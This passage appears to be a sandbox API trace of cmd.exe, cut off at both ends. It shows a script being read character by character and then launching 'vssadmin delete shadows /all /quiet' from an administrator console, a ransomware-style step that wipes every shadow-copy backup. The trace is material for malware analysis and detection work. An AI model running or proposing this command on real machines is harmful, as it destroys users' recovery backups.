lpWideCharStr=0x4a21e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0032.627] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.627] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.628] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.628] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0032.628] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.628] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.629] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.629] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.629] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.629] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.630] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.630] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0032.630] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.630] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.631] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.631] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.631] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.631] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.631] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] GetFileType (hFile=0xe8) returned 0x3 [0032.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.631] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.631] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.631] GetFileType (hFile=0xf4) returned 0x3 [0032.631] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.631] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0032.631] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x18f828, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f828*=0x24, lpOverlapped=0x0) returned 1 [0032.631] GetProcessHeap () returned 0x280000 [0032.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29f630 [0032.632] GetProcessHeap () returned 0x280000 [0032.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f630 | out: hHeap=0x280000) returned 1 [0032.632] GetProcessHeap () returned 0x280000 [0032.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x2997e0 [0032.632] GetProcessHeap () returned 0x280000 [0032.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x22) returned 0x294610 [0032.632] GetProcessHeap () returned 0x280000 [0032.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x29aa90 [0032.633] GetConsoleOutputCP () returned 0x4e3 [0032.633] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a21bfe0 | out: lpCPInfo=0x4a21bfe0) returned 1 [0032.633] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.633] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.633] GetProcessHeap () returned 0x280000 [0032.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x299910 [0032.633] GetProcessHeap () returned 0x280000 [0032.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x5a) returned 0x299b30 [0032.633] GetProcessHeap () returned 0x280000 [0032.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x299090 [0032.633] SetErrorMode (uMode=0x0) returned 0x0 [0032.633] SetErrorMode (uMode=0x1) returned 0x0 [0032.633] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2990a0, lpFilePart=0x18f070 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f070*="Desktop") returned 0x25 [0032.633] SetErrorMode (uMode=0x0) returned 0x1 [0032.633] GetProcessHeap () returned 0x280000 [0032.634] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299090, Size=0x6e) returned 0x299090 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299090) returned 0x6e [0032.634] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.634] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x128) returned 0x295b70 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x240) returned 0x281ab0 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x281ab0, Size=0x12a) returned 0x281ab0 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x281ab0) returned 0x12a [0032.634] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x299db0 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299db0, Size=0x7e) returned 0x299db0 [0032.634] GetProcessHeap () returned 0x280000 [0032.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299db0) returned 0x7e [0032.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0xffffffffffffffff [0032.634] GetLastError () returned 0x2 [0032.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0xffffffffffffffff [0032.634] GetLastError () returned 0x2 [0032.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0x299ba0 [0032.635] FindClose (in: hFindFile=0x299ba0 | out: hFindFile=0x299ba0) returned 1 [0032.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0xffffffffffffffff [0032.635] GetLastError () returned 0x2 [0032.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0x299ba0 [0032.635] FindClose (in: hFindFile=0x299ba0 | out: hFindFile=0x299ba0) returned 1 [0032.635] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0032.635] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0032.635] GetConsoleTitleW (in: lpConsoleTitle=0x18f330, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.635] GetProcessHeap () returned 0x280000 [0032.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x21c) returned 0x299110 [0032.635] GetConsoleTitleW (in: lpConsoleTitle=0x299120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.635] GetProcessHeap () returned 0x280000 [0032.635] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299110, Size=0xc0) returned 0x299110 [0032.635] GetProcessHeap () returned 0x280000 [0032.635] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299110) returned 0xc0 [0032.635] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0032.636] GetProcessHeap () returned 0x280000 [0032.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299110 | out: hHeap=0x280000) returned 1 [0032.636] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f0e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f0a8 | out: lpAttributeList=0x18f0e8, lpSize=0x18f0a8) returned 1 [0032.636] UpdateProcThreadAttribute (in: lpAttributeList=0x18f0e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f098, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f0e8, lpPreviousValue=0x0) returned 1 [0032.636] GetStartupInfoW (in: lpStartupInfo=0x18f200 | out: lpStartupInfo=0x18f200*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, 